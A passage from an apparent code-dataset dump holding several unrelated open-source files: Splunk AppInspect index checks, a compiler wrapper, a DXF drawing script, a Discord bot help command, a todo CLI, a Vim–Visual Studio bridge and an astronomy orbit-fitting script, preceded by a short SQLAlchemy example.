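The (Japanese) comments in the practice-blog-site record above describe SQLAlchemy's one-to-many wiring: the "many" side carries the ForeignKey, and `relationship(..., backref=...)` creates the reverse attribute automatically, so assigning a `User` to `BlogPost.author` fills in `author_id` and shows up in `User.posts`. A standalone miniature of that pattern (plain SQLAlchemy 1.4+, independent of the Flask app above):

```python
from sqlalchemy import Column, ForeignKey, Integer, String, create_engine
from sqlalchemy.orm import Session, declarative_base, relationship

Base = declarative_base()

class User(Base):
    __tablename__ = "users"
    id = Column(Integer, primary_key=True)
    name = Column(String(250))
    # backref="author" adds BlogPost.author; User.posts lists the children
    posts = relationship("BlogPost", backref="author")

class BlogPost(Base):
    __tablename__ = "blog_posts"
    id = Column(Integer, primary_key=True)
    title = Column(String(250))
    author_id = Column(Integer, ForeignKey("users.id"))  # the "many" side holds the key

engine = create_engine("sqlite://")
Base.metadata.create_all(engine)
with Session(engine) as session:
    u = User(name="demo")
    session.add(BlogPost(title="hello", author=u))
    session.commit()
    assert u.posts[0].author is u
```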
and add-ons should not create indexes. Indexes\"\n \" should only be defined by Splunk System\"\n \" Administrators to meet the data storage and\"\n \" retention needs of the installation. Consider\"\n \" using Tags or Source Types to identify data\"\n \" instead of index location. File: {}\"\n ).format(file_path)\n reporter.fail(reporter_output, file_path)\n\n\n@splunk_appinspect.cert_version(min=\"1.1.7\")\n@splunk_appinspect.tags(\"splunk_appinspect\", \"cloud\")\ndef check_validate_default_indexes_not_modified(app, reporter):\n \"\"\"Check that no default Splunk indexes are modified by the app.\"\"\"\n default_indexes = [\"_audit\", \"_internal\", \"_introspection\", \"_thefishbucket\",\n \"history\", \"main\", \"provider-family:hadoop\",\n \"splunklogger\", \"summary\", \"volume:_splunk_summaries\"]\n if app.file_exists(\"default\", \"indexes.conf\"):\n file_path = os.path.join(\"default\", \"indexes.conf\")\n indexes_config = app.get_config(\"indexes.conf\")\n for section in indexes_config.sections():\n if section.name in default_indexes:\n reporter_output = (\"The following index was modified: {}. File: {}, Line: {}.\"\n ).format(section,\n file_path,\n section.lineno)\n reporter.fail(reporter_output, file_path, section.lineno)\n else:\n reporter_output = \"No `default/indexes.conf` file exists.\"\n reporter.not_applicable(reporter_output)\n\n@splunk_appinspect.cert_version(min=\"1.5.0\")\n@splunk_appinspect.tags(\"splunk_appinspect\")\ndef check_index_definition_has_required_options(app, reporter):\n \"\"\"Check that all index definitions define all required options including:\n homePath, coldPath, and thawedPath.\n \"\"\"\n required_options = [\"homePath\", \"coldPath\", \"thawedPath\"]\n filter_section_prefix = (\"provider-family:\", \"provider:\", \"volume:\")\n virtual_index_required_option = \"vix.provider\"\n\n if app.file_exists(\"default\", \"indexes.conf\"):\n file_path = os.path.join(\"default\", \"indexes.conf\")\n indexes_config = app.get_config(\"indexes.conf\")\n for section in indexes_config.sections():\n # skip the default stanza\n if section.name == \"default\":\n continue\n # skip provider-family, provider and volume stanzas\n if section.name.startswith(filter_section_prefix):\n continue\n # skip virtual indexes\n if section.has_option(virtual_index_required_option):\n continue\n for required_option in required_options:\n if not section.has_option(required_option):\n lineno = section.lineno\n reporter_output = (\"The {} index definition does not have the required option: {}. \"\n \"File: {}, Line: {}.\"\n ).format(section.name,\n required_option,\n file_path,\n lineno)\n reporter.fail(reporter_output, file_path, lineno)\n else:\n reporter_output = \"No `default/indexes.conf` file exists.\"\n reporter.not_applicable(reporter_output)\n\n\n@splunk_appinspect.cert_version(min=\"1.5.3\")\n@splunk_appinspect.tags(\"cloud\")\ndef check_indexes_conf_properties(app, reporter):\n \"\"\"Check that indexes.conf only contains the required 'homePath', 'coldPath', and 'thawedPath' properties\n or the optional 'frozenTimePeriodInSecs' and 'disabled' properties. 
All other properties are prohibited.\n This check is cloud only because indexes are not allowed via check_indexes_conf_does_not_exist.\n \"\"\"\n\n # Check rules are defined in https://jira.splunk.com/browse/ACD-2053\n\n property_white_list = ['homePath', 'coldPath', 'thawedPath']\n property_optional_white_list = ['frozenTimePeriodInSecs', 'disabled', \"datatype\"]\n if app.file_exists(\"default\", \"indexes.conf\"):\n file_path = os.path.join(\"default\", \"indexes.conf\")\n conf_file = app.get_config(\"indexes.conf\")\n # check for all sections in this .conf file\n for section in conf_file.sections():\n # check for all properties\n for option_name, option_value, option_lineno in section.items():\n # in white list\n if option_name in property_white_list:\n legal_path = _get_legal_path(section.name, option_name)\n actual_path = option_value\n if legal_path != actual_path:\n reporter_output = (\"In stanza {}, property {} should be {}, but is {} here. \"\n \"File: {}, Line: {}.\"\n ).format(section.name,\n option_name,\n legal_path,\n actual_path,\n file_path,\n option_lineno)\n reporter.fail(reporter_output, file_path, option_lineno)\n # not in option_white_list\n elif option_name not in property_optional_white_list:\n reporter_output = (\"Illegal property {} found in stanza {}. Only properties [{}]\"\n \" are allowed in default/indexes.conf. File: {}, Line: {}.\"\n ).format(option_name,\n section.name,\n \", \".join(property_white_list + property_optional_white_list),\n file_path,\n option_lineno)\n reporter.fail(reporter_output, file_path, option_lineno)\n\n\ndef _get_legal_path(index_name, property_name):\n \"\"\"\n []\n homePath = $SPLUNK_DB//db\n coldPath = $SPLUNK_DB//colddb\n thawedPath = $SPLUNK_DB//thaweddb\n \"\"\"\n pattern = '$SPLUNK_DB/{}/{}'\n pattern_dict = {\"homePath\" : \"db\", \"coldPath\" : \"colddb\", \"thawedPath\" : \"thaweddb\"}\n return pattern.format(index_name, pattern_dict[property_name])\n","repo_name":"splunkdevabhi/appinspect","sub_path":"splunk_appinspect/checks/check_indexes_configuration_file.py","file_name":"check_indexes_configuration_file.py","file_ext":"py","file_size_in_byte":7143,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"70968044431","text":"import os, ntpath, re\nfrom Library import File, Library\nfrom Section import Section\nfrom Common import cmdLineOutput, makeBinUtilCommandFile\nfrom typing import List\nppcCompiler = 'powerpc-eabi-g++'\nbinUtilCommandFilePath = 'IntermediateFiles/binUtilCommands.txt'\n\nclass Compiler:\n STANDARD_OPTIONS = [\n '-ggdb3', '-nostartfiles', '-fomit-frame-pointer', '-fno-function-cse', '-ffunction-sections', '-fdata-sections',\n '-fno-exceptions', '-fno-rtti', '-fno-asynchronous-unwind-tables', '-fno-unwind-tables', '-fno-stack-check', '-std=c++17',\n '-fno-builtin', '-ffreestanding', '-mcpu=750', '-mmultiple', '-fno-inline', '-save-temps=obj', '-fno-eliminate-unused-debug-symbols', '-fno-eliminate-unused-debug-types',\n '-fverbose-asm', '-fno-threadsafe-statics', '-z common-page-size=4', '-z max-page-size=4',\n '-Wl,\"--relax\"', '-Wl,\"--gc-sections\"']\n\n def __init__(self, options: list=None):\n if options is None:\n options = self.STANDARD_OPTIONS\n self.options = options\n\n def compile(self, cppFile: File, libraries, textStart: int=None, dataStart: int=None, sections: List[Section]=None, outPath: str=None, extraOptions: list=None):\n if not cppFile.exists():\n raise AssertionError(f\"{cppFile.path} not found\")\n else:\n options = 
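`_get_legal_path` in the appinspect record above just formats the canonical `$SPLUNK_DB` layout for an index; mirroring it makes the expected values concrete (this mirror is for illustration only):

```python
# illustrative mirror of _get_legal_path from the record above
pattern_dict = {"homePath": "db", "coldPath": "colddb", "thawedPath": "thaweddb"}

def legal_path(index_name: str, property_name: str) -> str:
    return "$SPLUNK_DB/{}/{}".format(index_name, pattern_dict[property_name])

assert legal_path("my_index", "homePath") == "$SPLUNK_DB/my_index/db"
assert legal_path("my_index", "thawedPath") == "$SPLUNK_DB/my_index/thaweddb"
```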
self.options.copy()\n if textStart is not None:\n options.append(f'-Wl,\"-Ttext={hex(textStart)}\"')\n if dataStart is not None:\n options.append(f'-Wl,\"--section-start=.rodata={hex(dataStart)}\"')\n if sections is not None:\n for s in sections:\n options.append(f'-Wl,\"--section-start={s.name}={hex(s.address)}\"')\n\n if extraOptions is not None:\n options.extend(extraOptions)\n commandFile = makeBinUtilCommandFile(' '.join(options))\n if outPath is None:\n outPath = ntpath.splitext(cppFile.path)[0]\n libraries = ' '.join([lib.path for lib in libraries])\n compileCommand = f\"{ppcCompiler} {cppFile.path} @{commandFile.path} {libraries} {libraries} {libraries} -o {outPath}\"\n try:\n output = cmdLineOutput(compileCommand)\n output = filterUselessWarnings(output)\n if output:\n print(output)\n except:\n os.system(compileCommand)\n else:\n return Library(outPath)\n\n\ndef filterUselessWarnings(output):\n output = re.sub('.*warning: cannot find entry symbol _start.*', '', output)\n output = re.sub('.*warning: dot moved backwards before.*', '', output)\n output = output.strip()\n return output","repo_name":"Brawlback-Team/brawlback-asm","sub_path":"BuildSystem/src/Compiler.py","file_name":"Compiler.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"83"} +{"seq_id":"44175932703","text":"from django import template\nregister = template.Library()\n\n@register.inclusion_tag('tag_show_house_list.html')\ndef show_house_list(house_list, logged_user, multiline=True, user_buttons=True):\n context = {\n 'house_list': house_list,\n 'logged_user' : logged_user,\n 'multiline' : multiline,\n 'user_buttons' : user_buttons\n }\n\n return context\n","repo_name":"HE-Arc/Home2Share","sub_path":"Home2ShareProject/main/templatetags/house_tags.py","file_name":"house_tags.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"18204870329","text":"import ezdxf\nfrom ezdxf.addons import text2path\nfrom ezdxf.enums import TextEntityAlignment\nfrom ezdxf.math import ConstructionArc\nfrom ezdxf.gfxattribs import GfxAttribs\nimport pathlib\nimport ezdxf\nfrom ezdxf import path, zoom, units\nfrom ezdxf.tools import fonts\nfrom ezdxf.addons import text2path\nfrom ezdxf.enums import TextEntityAlignment\n\n\n\ndef get_rect(msp,width,heigth,radius,set_point= (0,0)):\n msp.add_line((set_point[0]+radius,set_point[1]), (set_point[0]+width-radius, set_point[1]))\n x = (set_point[0]+width-radius,set_point[1])\n y = (set_point[0] + width, set_point[1] - radius)\n arc = ConstructionArc.from_2p_radius(\n start_point=x, end_point=y, radius=radius, ccw=False\n )\n arc.add_to_layout(msp, dxfattribs=attribs)\n\n\n\n\n msp.add_line((set_point[0]+width, set_point[1]-radius), (set_point[0]+width,set_point[1]-heigth+radius))\n x = (set_point[0]+width,set_point[1]-heigth+radius)\n y = (set_point[0]+width-radius, set_point[1] - heigth)\n arc = ConstructionArc.from_2p_radius(\n start_point=x, end_point=y,\n radius=radius, ccw=False\n )\n arc.add_to_layout(msp, dxfattribs=attribs)\n\n\n\n msp.add_line((set_point[0]+radius,set_point[1]-heigth), (set_point[0]+width-radius, set_point[1]-heigth))\n x = (set_point[0] + radius, set_point[1]-heigth)\n y = (set_point[0], set_point[1]-heigth + radius)\n arc = ConstructionArc.from_2p_radius(\n start_point=x,\n end_point=y,\n radius=radius, ccw=False\n )\n arc.add_to_layout(msp, dxfattribs=attribs)\n\n\n\n 
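`Compiler.compile` above turns each Section into a `--section-start` linker flag before handing everything to powerpc-eabi-g++. The flag-building step in isolation (the dataclass below stands in for the repo's own Section class):

```python
from dataclasses import dataclass
from typing import List

@dataclass
class Section:          # stand-in for the repo's Section class
    name: str
    address: int

def section_flags(sections: List[Section]) -> List[str]:
    # one quoted -Wl,--section-start flag per section, address rendered in hex
    return [f'-Wl,"--section-start={s.name}={hex(s.address)}"' for s in sections]

print(section_flags([Section(".text", 0x80001800)]))
# ['-Wl,"--section-start=.text=0x80001800"']
```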
msp.add_line((set_point[0] , set_point[1]-radius), (set_point[0], set_point[1]-heigth + radius))\n x = (set_point[0] , set_point[1]-radius)\n y = (set_point[0]+radius,set_point[1])\n\n arc = ConstructionArc.from_2p_radius(\n start_point=x,\n end_point=y,\n radius=radius, ccw=False\n )\n arc.add_to_layout(msp, dxfattribs=attribs)\n\n return msp\n\ndoc = ezdxf.new(\"R2010\", setup=True)\ndoc.units = units.CM\nmsp = doc.modelspace()\nattribs = GfxAttribs(layer=\"ENTITY\")\n\n\ndef add_text(msp,text,pos,length = 1):\n z = ezdxf.math.Matrix44()\n z = z.translate(pos[0],pos[1],0)\n attr = {\"layer\": \"OUTLINE\", \"color\": 1}\n ff = fonts.FontFace(family=\"OpenSans\")\n s = text\n align = TextEntityAlignment.ALIGNED\n path.render_splines_and_polylines(\n msp, text2path.make_paths_from_str(s, ff, align=align,m = z,length = length), dxfattribs=attr\n )\n\n attr[\"layer\"] = \"FILLING\"\n attr[\"color\"] = 2\n for hatch in text2path.make_hatches_from_str(\n s, ff, align=align, dxfattribs=attr\n ):\n msp.add_entity(hatch)\n return msp\n\nget_rect(msp,7,4,0.5)\nadd_text(msp,\"David\",(3.5,-3),length = 7*0.95)\ndoc.saveas(\"test.dxf\")","repo_name":"DavidZah/cards_generator","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"8382061113","text":"from utils.safe import JusticePlugin\n\nfrom disco.types.message import MessageEmbed\n\n\nclass HelpPlug(JusticePlugin):\n \"\"\"Help | Display command details\"\"\"\n\n __name__ = \"HelpPlug\"\n\n @JusticePlugin.command(\"help\", \"[name:str]\")\n def show_help(self, event, name: str = None):\n \"\"\"Explain commands or list them\n\n The help commands provides an easy way for you to learn about a certain command, or list available ones.\n\n If you want to access a specific command, type `]help `, For example, `]help ban`.\n\n If you want to display a list all command categories, simply type `]help` with nothing else.\n\n If you want to list all commands in a category, simply type `]help `, For example, `]help Mod`\n\n Tip: commands will always be all lower case, command categories are Titled.\n \"\"\"\n\n if not name:\n embed = MessageEmbed()\n embed.color = 0x00FFFF\n embed.title = \"List Command Categories\"\n embed.description = \"If you want to see how to use the help command, type `]help help`, otherwise, \" \\\n \"below are the available command categories.\"\n for plugin in self.bot.plugins.values():\n name, desc = plugin.__doc__.split(' | ')\n embed.add_field(name=name, value=desc, inline=False)\n event.msg.reply(embed=embed)\n elif name.title() == name:\n for plugin in self.bot.plugins.values():\n if name in plugin.__doc__:\n break\n else:\n return event.msg.reply(\"Sorry, but I could not find the category '{0}'\".format(name))\n\n embed = MessageEmbed()\n embed.color = 0x00FFFF\n embed.title = plugin.__doc__\n\n for func in plugin.meta_funcs:\n if hasattr(func, 'docs'):\n embed.add_field(name=func.docs[0], value=func.docs[1], inline=False)\n\n event.msg.reply(embed=embed)\n else:\n for plugin in self.bot.plugins.values():\n for func in plugin.meta_funcs:\n if hasattr(func, 'docs') and func.docs[0] == name:\n embed = MessageEmbed()\n embed.title = func.docs[1]\n embed.color = 0x00FFFF\n embed.description = func.docs[2]\n return event.msg.reply(embed=embed)\n event.msg.reply(\"Sorry, but I could not find the command '{0}'\".format(name))\n\n\ndel JusticePlugin # We don't want disco to load this 
plugin\n","repo_name":"replit-discord/justice","sub_path":"plugins/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"83"} +{"seq_id":"6572148251","text":"def stubbornness(*data):\n\n res = []\n for i in data:\n if len(i) >= 2:\n q1 = int(i[0])\n m = list(map(lambda x: int(x), i[1::]))\n q2 = max(m)\n q3 = min(m)\n if 0 == q2 or 0 == q3:\n raise ZeroDivisionError('Cannot be divided by zero')\n else:\n if (q1 % q2 == 0) and (q1 % q2 == 0):\n res.append(q1)\n else:\n raise NotEnoughError('Not enough values')\n if res:\n res.sort()\n return res\n raise IndexError('Empty Return Error')\n\n\nclass NotEnoughError(Exception):\n pass\n","repo_name":"ProvPavel/ProvPavelProjects","sub_path":"kutfkitfityfif.py","file_name":"kutfkitfityfif.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"74755499790","text":"import sys\r\n\r\ncommand_arg = sys.argv[1]\r\narg_list = sys.argv[2:]\r\n\r\nfile = \"todo.txt\"\r\n\r\ndef add(task_list):\r\n\ttodo_file = open(file, 'a')\r\n\tfor task in task_list:\r\n\t\ttodo_file.write(task + '\\n')\r\n\ttodo_file.close()\r\n\r\ndef rm(index_list):\r\n\tindex_list = [int(x) for x in index_list]\r\n\ttodo_file = open(file, 'r')\r\n\tlines = todo_file.readlines()\r\n\ttodo_file.close()\r\n\r\n\tfor i in index_list:\r\n\t\tdel lines[i-1]\r\n\r\n\tnew_file = open(file, 'w+')\r\n\tfor line in lines:\r\n\t\tnew_file.write(line)\r\n\tnew_file.close()\r\n\r\ndef strike(text):\r\n\tresult = ''\r\n\tfor c in text:\r\n\t\tresult = result + c + '\\u0336'\r\n\treturn result\r\n\r\ndef done(index_list):\r\n\tindex_list = [int(x) for x in index_list]\r\n\ttodo_file = open(file, 'r')\r\n\tlines = todo_file.readlines()\r\n\tfor i in index_list:\r\n\t\tlines[i-1] = strike(lines[i-1])\r\n\r\n\tnew_file = open(file, 'w+')\r\n\tfor line in lines:\r\n\t\tnew_file.write(line)\r\n\tnew_file.close()\r\n\r\ndef printer():\r\n\ttodo_file = open(file, 'r')\r\n\ttasks = todo_file.readlines()\r\n\tfor i, task in enumerate(tasks):\r\n\t\tprint(i+1, task)\r\n\r\nif command_arg == \"add\":\r\n\tadd(arg_list)\r\n\r\nif command_arg == \"rm\":\r\n\trm(arg_list)\r\n\r\nif command_arg == \"done\":\r\n\tdone(arg_list)\r\n\r\nprinter()","repo_name":"danj98/todo","sub_path":"todo.py","file_name":"todo.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"9605747492","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport pandas as pd\nfrom simpson_paradox_finder import SimpsonParadoxFinder\nfrom sklearn.datasets import load_iris\n\npd.set_option('display.max_columns', None)\npd.set_option('display.max_rows', None)\n\ndata_path = './Data/'\n\nfile = os.path.join(data_path, 'UCB_admissions_data.csv')\ndata = pd.read_csv(file)\ntarget = 'Admit'\ntreatment = 'Gender'\nfeatures = ['Dept']\nfeatures_onehot = ['Dept']\n\n# model parameters\nparams = {'subgroup_dim': 2, 'hidden_layer': 2, 'hidden_dim': 64,\n 'learning_rate': 0.01, 'alpha': 1, 'beta': 10, 'batch_size': 64,\n 'epoch': 50, 'seed': 22, 'activation': False, 'find_strong_amp': False}\n\n# run model\nspf = SimpsonParadoxFinder(data, target, features, treatment=treatment, features_onehot=features_onehot, is_binary_target=False)\nret = spf.get_simpson_pairs(method='simnet', params=params, verbose=False)\n\nprint(\"\\nResult of Simpson's Paradox 
Finder:\")\nfor t in ret:\n print('T={}, Y={}, Z={}, paradox_types={}'.format(*t))\n\ngroup_distribution = spf.get_subgroup_distribution()\nprint('\\nFeature distribution:\\n', group_distribution)\n\n# save output\n# output = spf.finder.output\n","repo_name":"ant-research/Learning-to-Discover-Various-Simpson-Paradoxes","sub_path":"run_berkeley.py","file_name":"run_berkeley.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"12185796271","text":"import vim\nimport pynvim\nimport VS_wrapper\n\n# tab_based_config = False\n# instances = VS_wrapper.get_instances()\n# def __init__(self) -> None:\n # self.tab_based_config = False\n\n# def set_use_tab_based_config(tab_based=True):\n# tab_based_config = tab_based\n\nclass Vim_wrapper:\n class NoLink(IndexError):\n pass\n\n def __init__(self) -> None:\n self.tab_based_config = True\n self.reload()\n\n def open_current(self):\n try:\n file = vim.current.buffer.name\n line, col = vim.current.window.cursor\n self._get_linked_instance().open_location(file, line, col)\n except Vim_wrapper.NoLink:\n pass\n\n def reload(self):\n self.instances = VS_wrapper.get_instances()\n\n def activate(self):\n self._forward_to_linked(VS_wrapper.Instance.activate)\n\n def set_focus(self):\n self._forward_to_linked(VS_wrapper.Instance.set_focus)\n\n def toggle_breakpoint(self):\n # try:\n # inst = self._get_linked_instance()\n file_name = vim.current.buffer.name\n line, _ = vim.current.window.cursor\n self._forward_to_linked(VS_wrapper.Instance.toggle_breakpoint, file_name, line) \n\n def start_debugging(self):\n self._forward_to_linked(VS_wrapper.Instance.start_debugging)\n\n @staticmethod\n def _get_format_str(is_current):\n if is_current:\n return \"\\t*{}: {}\"\n return \"\\t {}: {}\"\n\n def set_startup_project(self):\n try: \n inst = self._get_linked_instance()\n current_startup_project = inst.get_startup_project()\n project_list = inst.get_project_list()\n\n selections_strings = \\\n [ Vim_wrapper._get_format_str(p.Name == current_startup_project).format(idx, p)\n for idx, p in enumerate(project_list) ]\n selections_strings.insert(0, \"Select Project\")\n selected = vim.funcs.inputlist(selections_strings)\n\n if selected in range(0, len(project_list)):\n inst.set_startup_project(project_list[selected])\n\n except Vim_wrapper.NoLink:\n pass\n\n def test(self):\n return self._forward_to_linked(VS_wrapper.Instance.test)\n\n def set_solution(self):\n self.instances = VS_wrapper.get_instances()\n if len(self.instances) == 0:\n print(\"No instances detected\")\n self._set_current_solution(None)\n return\n if len(self.instances) == 1:\n self._set_current_solution(next(iter(self.instances)))\n print(\"One instance found and set\")\n return\n\n current = self._get_linked_instance_key()\n\n text = [\"Select Solution\"]\n\n select_dict = {}\n counter = 1\n for (key, value) in self.instances.items():\n format = Vim_wrapper._get_format_str(current is not None and current == key)\n text.append(format.format(counter, value.get_solution_name()))\n\n select_dict[counter] = key\n counter += 1\n\n selected_key = vim.funcs.inputlist(text)\n if selected_key in select_dict:\n self._set_current_solution(select_dict[selected_key])\n\n def _get_linked_instance_key(self):\n if vim.current.tabpage.vars.get(\"vsi_current\") is not None:\n return vim.current.tabpage.vars[\"vsi_current\"]\n\n return vim.vars.get(\"vsi_current\")\n\n def _get_linked_instance(self):\n key = 
self._get_linked_instance_key()\n if key in self.instances:\n return self.instances[key]\n print(\"Linked instance key isn't in instance dict. Run set_solution to re-initialize\")\n raise Vim_wrapper.NoLink\n\n def _forward_to_linked(self, VS_wrapper_mothod, *args):\n try:\n return VS_wrapper_mothod(self._get_linked_instance(), *args)\n except Vim_wrapper.NoLink:\n pass\n\n def _set_current_solution(self, value):\n if value is None:\n exists = vim.funcs.exists\n if exists(\"t:vsi_current\"): vim.api.tabpage_del_var(0, \"vsi_current\")\n if exists(\"g:vsi_current\"): vim.api.del_var(\"vsi_current\")\n return\n\n if self.tab_based_config:\n vim.current.tabpage.vars[\"vsi_current\"] = value\n else:\n vim.vars[\"vsi_current\"] = value\n","repo_name":"Drllap/visual-studio-integration.vim","sub_path":"python3/Vim_wrapper.py","file_name":"Vim_wrapper.py","file_ext":"py","file_size_in_byte":4322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"43712195536","text":"import numpy as np\nimport os\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib import patches\nimport matplotlib.transforms as transforms\nfrom astropy.time import Time\n\nfrom orbitize import system, read_input, priors, sampler\nfrom orbitize import results\n\n\"\"\"\nFits to run:\n1. lit astrometry only (True, False, False, False, False)\n2. lit astrometry + first GRAVITY epoch (True, True, False, False, False)\n2.5. lit astrometry + second GRAVITY epoch (True, False, True, False, False)\n3. lit astrometry + first 2 GRAVITY (True, True, True, False, False)\n4. first 2 GRAVITY only (False, True, True, False, False)\n5. first 2 GRAVITY with e fixed to 0 (True, True, True, True, False)\n6. first 2 GRAVITY with linearly decreasing prior on e (True, True, True, False, True)\n7. all astrometry\n8. all astrometry with e fixed to 0\n9. all astrometry with linearly decreasing e prior\n10. 
all astrometry except NACO, linearly decreasing e prior\n\"\"\"\n\nnp.random.seed(10)\n\n\"\"\"\nBegin keywords <<\n\"\"\"\nrun_fit = False\nmake_corner = True\n\nlit_astrom = True\nfirst_grav = True\nsecond_grav = True\nthird_grav = True\nexclude_naco = False\nfix_ecc = False\nlin_ecc_prior = False\n\nsavedir = \"results/\"\n\nif not os.path.exists(savedir):\n os.mkdir(savedir)\n\nif lit_astrom:\n savedir += \"with_literature_astrom\"\nif first_grav:\n savedir += \"with_first_vlti_point\"\nif second_grav:\n savedir += \"with_second_vlti_point\"\nif third_grav:\n savedir += \"with_third_vlti_point\"\nif fix_ecc:\n savedir += \"_fixed_ecc\"\nif lin_ecc_prior:\n savedir += \"_linear_ecc\"\nif exclude_naco:\n savedir += \"_noNACO\"\n\"\"\"\n>> End keywords\n\"\"\"\n\nif not os.path.exists(savedir):\n os.mkdir(savedir)\n\ninput_file = \"HIP65426.csv\"\nplx = 9.303088053872793 # [mas] (Gaia eDR3)\nplx_err = 0.034559656\nm_st = 1.96 # [M_sol] (Bowler+ 2020)\nmass_err = 0.04\n\nnum_secondary_bodies = 1\ndata_table = read_input.read_file(input_file)\ninsts = data_table[\"instrument\"]\n\nif not lit_astrom:\n data_table = data_table[data_table[\"instrument\"] == \"GRAVITY\"]\nif not first_grav:\n data_table = data_table[0 : -2 & -2 :]\nif not second_grav:\n data_table = data_table[0 : -1 & -1]\nif not third_grav:\n data_table = data_table[0:-1]\nif exclude_naco:\n data_table = data_table[data_table[\"instrument\"] != \"NACO\"]\n\nprint(data_table)\n\nHIP654_system = system.System(\n num_secondary_bodies,\n data_table,\n m_st,\n plx,\n fit_secondary_mass=False,\n mass_err=mass_err,\n plx_err=plx_err,\n)\n\n# fix eccentricity to 0\nif fix_ecc:\n HIP654_system.sys_priors[HIP654_system.param_idx[\"ecc1\"]] = 0\n\n# set a linearly decreasing prior on ecc\nif lin_ecc_prior:\n HIP654_system.sys_priors[HIP654_system.param_idx[\"ecc1\"]] = priors.LinearPrior(\n -2.18, 2.01\n )\n\n# Check that orbitizie! 
initialized everything correctly.\n# (I wrote the code, therefore I do not trust the code.)\nassert not HIP654_system.fit_secondary_mass\nassert not HIP654_system.track_planet_perturbs\n\n# run MCMC\nnum_threads = 50\nnum_temps = 20\nnum_walkers = 1000\nnum_steps = 50_000_000 # 200_000_000 # n_walkers x n_steps_per_walker\nburn_steps = 10_000 # 100_000\nthin = 100\n\nif run_fit:\n HIP654_sampler = sampler.MCMC(\n HIP654_system,\n num_threads=num_threads,\n num_temps=num_temps,\n num_walkers=num_walkers,\n )\n HIP654_sampler.run_sampler(num_steps, burn_steps=burn_steps, thin=thin)\n\n # save chains\n HIP654_sampler.results.save_results(\"{}/chains.hdf5\".format(savedir))\n\nHIP654_results = results.Results() # create blank results object for loading\nHIP654_results.load_results(\"{}/chains.hdf5\".format(savedir))\n\n# chop chains\n# num_chop = 1000\n# reshaped_post = HIP654_results.post.reshape(\n# (num_walkers, num_steps // num_walkers // thin, HIP654_results.post.shape[1])\n# )\n# HIP654_results.post = reshaped_post[:, -num_chop:, :].reshape(\n# (-1, HIP654_results.post.shape[1])\n# )\n\n# make corner plot\n\nif make_corner:\n if fix_ecc:\n param_list = [\"sma1\", \"inc1\", \"aop1\", \"pan1\", \"tau1\", \"mtot\", \"plx\"]\n else:\n param_list = None\n\n corner_kwargs = {\"show_titles\": True} # , \"quantiles\": [0.16, 0.84]}\n\n # median_values = np.median(HIP654_results.post, axis=0)\n # range_values = np.ones_like(median_values)*0.997 # Plot only 3-sigma range for each parameter\n fig = HIP654_results.plot_corner(\n param_list=param_list, range=[(40, 120), 1, 1, 1, 1, 1, 1, 1], **corner_kwargs\n )\n for ax in fig.get_axes():\n ax.tick_params(axis=\"both\", labelsize=14)\n ax.set_xlabel(ax.get_xlabel(), fontsize=14)\n ax.set_ylabel(ax.get_ylabel(), fontsize=14)\n ax.set_title(ax.get_title(), fontsize=14)\n plt.savefig(\"{}/corner.png\".format(savedir), dpi=250)\n\n# make orbit plot\nfig = HIP654_results.plot_orbits(\n num_epochs_to_plot=500, start_mjd=56000, plot_astrometry=False\n)\nradec_ax, sep_ax, pa_ax, cbar_ax = fig.axes\n\nsep, serr, pa, paerr = (\n data_table[\"quant1\"],\n data_table[\"quant1_err\"],\n data_table[\"quant2\"],\n data_table[\"quant2_err\"],\n)\nepoch = Time(data_table[\"epoch\"], format=\"mjd\").decimalyear\n\nsphere_mask = np.where(insts == \"SPHERE\")[0]\nnaco_mask = np.where(insts == \"NACO\")[0]\ngrav_mask = np.where(insts == \"GRAVITY\")[0]\n\ngravity_ra, gravity_dec = sep[grav_mask], pa[grav_mask]\nsphere_ra, sphere_dec = system.seppa2radec(sep[sphere_mask], pa[sphere_mask])\nnaco_ra, naco_dec = system.seppa2radec(sep[naco_mask], pa[naco_mask])\n\nradec_ax.scatter(sphere_ra, sphere_dec, marker=\"o\", color=\"hotpink\", zorder=20, s=3)\nradec_ax.scatter(naco_ra, naco_dec, marker=\"o\", color=\"hotpink\", zorder=20, s=3)\nradec_ax.scatter(gravity_ra, gravity_dec, marker=\"o\", color=\"hotpink\", zorder=20, s=3)\n\ngravity_sep, gravity_pa = system.radec2seppa(sep[grav_mask], pa[grav_mask])\n\ngravity_raerr, gravity_decerr, gravity_corr = (\n data_table[\"quant1_err\"][grav_mask],\n data_table[\"quant2_err\"][grav_mask],\n data_table[\"quant12_corr\"][grav_mask],\n)\n\nsep_ax.errorbar(\n epoch[sphere_mask],\n sep[sphere_mask],\n serr[sphere_mask],\n marker=\"^\",\n color=\"purple\",\n markeredgecolor=\"purple\",\n markerfacecolor=\"white\",\n ls=\"\",\n label=\"SPHERE\",\n)\nsep_ax.errorbar(\n epoch[naco_mask],\n sep[naco_mask],\n serr[naco_mask],\n marker=\"s\",\n ls=\"\",\n color=\"purple\",\n label=\"NACO\",\n)\nsep_ax.scatter(\n epoch[grav_mask], 
